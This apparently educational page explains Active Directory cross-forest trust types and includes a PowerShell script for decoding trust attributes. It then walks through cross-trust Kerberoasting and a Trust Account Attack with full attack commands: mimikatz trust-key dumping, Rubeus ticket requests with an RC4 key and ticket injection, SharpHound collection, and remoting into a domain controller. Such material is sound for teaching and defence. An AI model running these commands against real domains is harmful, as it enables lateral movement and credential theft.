In Active Directory (AD), a trust is a connection between the authentication systems of two domains, allowing users from one domain to access resources in another. Trusts exist both within a single AD forest and between separate forests (cross-forest trusts). There are many ways to attack cross-forest trusts.
Types of Cross-Forest Trusts
- External Trust: Connects two individual domains that live in different forests with no forest trust between them. It is non-transitive (only the two named domains are joined) and has SID filtering (quarantine) enabled by default to block SID History abuse.
- Forest Trust: Connects two entire AD forests at their forest roots and is transitive, so users from any domain in one forest can authenticate to any domain in the other, as far as the trust direction allows. If Forest A trusts Forest X, any user from any domain in Forest X can access any domain in Forest A. SID filtering is also enabled on forest trusts by default, but an administrator can relax it (for example to allow SID History during migrations).
| | One-Way Trust | Two-Way Trust |
|---|---|---|
| Direction of Access | Trusted → Trusting | Both ways (bidirectional) |
| Who Can Access What? | Users in the trusted domain can access resources in the trusting domain, but not vice versa. | Users from both domains/forests can access each other's resources. |
| Common Use Case | A parent company lets employees of a subsidiary reach shared resources, but not the other way around. | Common in large organizations where domains need to share resources freely. |
| Security Risk | Lower on paper, as access is limited to one direction; the trust key still gives the trusting side a path back into the trusted side (see the Trust Account Attack below). | Higher, since a compromise in one domain/forest directly exposes the other. |
In a nutshell
- AD trusts allow users in different domains/forests to access each other's resources.
- External Trusts are non-transitive and have SID Filtering enabled by default, which makes them the more restrictive option.
- Forest Trusts are transitive and therefore more flexible but riskier: a user from any domain in one forest can authenticate to any domain in the other.
- One-Way Trusts allow access in only one direction, while Two-Way Trusts allow access in both directions.
- Attackers can abuse trust relationships that are misconfigured, and some techniques (such as the Trust Account Attack below) work against a default one-way trust.
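To read these properties off a real trust, here is an added PowerShell example (not part of the original page) that decodes the trustAttributes bits and the Direction value the way the table above describes them. The flag values follow the trustAttributes definition in MS-ADTS; the sample objects at the bottom are constructed to mirror the logistics.ad / megacorp.ad trust used later on this page, and the local NetBIOS name LOGISTICS is an assumption. The live query at the end needs the RSAT ActiveDirectory module and a user in the local domain.

```powershell
# Added example, not code from the original page. The decoder is pure and runs on
# constructed sample objects shaped like Get-ADTrust output; the commented live
# query at the end needs the RSAT ActiveDirectory module.

# trustAttributes bit flags as defined in MS-ADTS.
$TrustAttributeFlags = [ordered]@{
    0x0001 = 'NON_TRANSITIVE'
    0x0002 = 'UPLEVEL_ONLY'
    0x0004 = 'QUARANTINED_DOMAIN'                      # SID filtering on an external trust
    0x0008 = 'FOREST_TRANSITIVE'                       # forest trust
    0x0010 = 'CROSS_ORGANIZATION'                      # selective authentication
    0x0020 = 'WITHIN_FOREST'                           # parent/child or shortcut trust
    0x0040 = 'TREAT_AS_EXTERNAL'                       # forest trust relaxed to external-style SID filtering (SID history enabled)
    0x0080 = 'USES_RC4_ENCRYPTION'
    0x0200 = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION'
    0x0400 = 'PIM_TRUST'
    0x0800 = 'CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION'
}

function ConvertFrom-TrustAttributes {
    param([Parameter(Mandatory)][int]$Value)
    foreach ($kv in $TrustAttributeFlags.GetEnumerator()) {
        if (($Value -band $kv.Key) -ne 0) { $kv.Value }
    }
}

function Get-TrustSummary {
    # $Trust must expose Name, Direction and TrustAttributes (Get-ADTrust objects do).
    # $LocalNetBIOS is the NetBIOS name of the domain the query is run from (assumed).
    param(
        [Parameter(Mandatory)]$Trust,
        [Parameter(Mandatory)][string]$LocalNetBIOS
    )
    $flags = @(ConvertFrom-TrustAttributes $Trust.TrustAttributes)

    $kind = if ($flags -contains 'WITHIN_FOREST')         { 'Intra-forest' }
            elseif ($flags -contains 'FOREST_TRANSITIVE') { 'Forest' }
            else                                          { 'External' }

    # Outbound = this domain trusts $Trust.Name: we are the trusting side, they are trusted,
    # so their users reach our resources. Inbound is the mirror image.
    $direction = "$($Trust.Direction)"
    $access = switch ($direction) {
        'Outbound'      { "$($Trust.Name) users -> $LocalNetBIOS resources" }
        'Inbound'       { "$LocalNetBIOS users -> $($Trust.Name) resources" }
        'BiDirectional' { 'both ways' }
        default         { 'disabled' }
    }
    # The trusting side's trust account (<NetBIOS>$) lives in the trusted domain and its
    # key sits in the trusting side's TDO, which is what the Trust Account Attack dumps.
    $trustAccount = switch ($direction) {
        'Outbound'      { "$LocalNetBIOS`$ exists in $($Trust.Name); its key is in our TDO" }
        'Inbound'       { "their trust account exists in $LocalNetBIOS; its key is on their DCs" }
        'BiDirectional' { 'one trust account on each side' }
        default         { 'n/a' }
    }
    # External trusts filter SIDs only when QUARANTINED_DOMAIN is set; forest trusts
    # filter by default unless TREAT_AS_EXTERNAL relaxes them.
    $sidFiltering = switch ($kind) {
        'External' { if ($flags -contains 'QUARANTINED_DOMAIN') { 'on' } else { 'OFF (SID History abuse possible)' } }
        'Forest'   { if ($flags -contains 'TREAT_AS_EXTERNAL') { 'relaxed (SID history enabled)' } else { 'on' } }
        default    { 'n/a (same forest)' }
    }

    [pscustomobject]@{
        Partner      = $Trust.Name
        Kind         = $kind
        Transitive   = -not ($flags -contains 'NON_TRANSITIVE')
        Access       = $access
        TrustAccount = $trustAccount
        SidFiltering = $sidFiltering
        Flags        = ($flags -join ',')
    }
}

# Constructed sample shaped like Get-ADTrust output, mirroring this page's scenario:
# logistics.ad has an outbound forest trust to megacorp.ad (logistics trusts megacorp),
# plus a hypothetical inbound external trust with SID filtering switched off.
$sample = @(
    [pscustomobject]@{ Name = 'megacorp.ad';   Direction = 'Outbound'; TrustAttributes = 0x0008 }
    [pscustomobject]@{ Name = 'partner.local'; Direction = 'Inbound';  TrustAttributes = 0x0001 }
)
$sample | ForEach-Object { Get-TrustSummary -Trust $_ -LocalNetBIOS 'LOGISTICS' } | Format-List

# Live version (RSAT ActiveDirectory module, run from the local domain):
# Get-ADTrust -Filter * | ForEach-Object { Get-TrustSummary -Trust $_ -LocalNetBIOS (Get-ADDomain).NetBIOSName }
```

In the sample output the megacorp.ad row reads Kind Forest, Access "megacorp.ad users -> LOGISTICS resources" and TrustAccount "LOGISTICS$ exists in megacorp.ad; its key is in our TDO", which is exactly the situation the Trust Account Attack below exploits; the partner.local row is flagged as an external trust with SID filtering off.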
Kerberoasting targeting a Domain
# Kerberoast a single account (holly) in the logistics.ad domain across the trust
.\Rubeus.exe kerberoast /domain:logistics.ad /user:holly
Trust Account Attack
Consider a one-way trust in which Forest A trusts Forest B: users from B can access resources in A, but users from A cannot access B. The Trust Account Attack breaks this rule and lets an attacker who already controls Forest A (the trusting side) authenticate into Forest B (the trusted side).
When the trust is created, a trust account named after the trusting forest (A$) is automatically created in Forest B, the trusted forest. It is an ordinary user object in B (a member of Domain Users, without interactive logon rights) whose password is the shared trust key, and that same key is stored in the trusted domain object (TDO) on A's domain controllers. An attacker with Domain Admin rights in Forest A can dump the key from a DC in A and use it to request a Kerberos TGT for A$ from Forest B, bypassing the one-way restriction. The trust key rotates automatically every 30 days, so a dumped key must be used before it expires.
# Enumerate the trust from the trusting forest (logistics.ad); Direction Outbound means logistics.ad trusts megacorp.ad
Get-ADTrust -Identity megacorp.ad
# SharpHound collection scoped to the target domain
.\SharpHound.exe -c All -d megacorp.ad
# Extract the trust keys; run with Domain Admin rights on a DC of the trusting forest (logistics.ad)
.\mimikatz.exe "lsadump::trust /patch" exit
# Request a TGT for the trust account logistics$ from megacorp.ad with the dumped RC4 trust key and inject it
.\Rubeus.exe asktgt /user:logistics$ /domain:megacorp.ad /rc4:68e456d3a95cc748ac5a2eae679b9c91 /ptt
# With the logistics$ ticket in memory, Kerberoast megacorp.ad as a regular domain user
.\Rubeus.exe kerberoast /domain:megacorp.ad
# Or, after cracking a roasted account, request a ticket for it directly
.\Rubeus.exe asktgt /user:white.beard /password:<SNIP> /domain:megacorp.ad /ptt
# Open a remoting session to a megacorp.ad domain controller using the injected ticket
New-PSSession -ComputerName DC03.megacorp.ad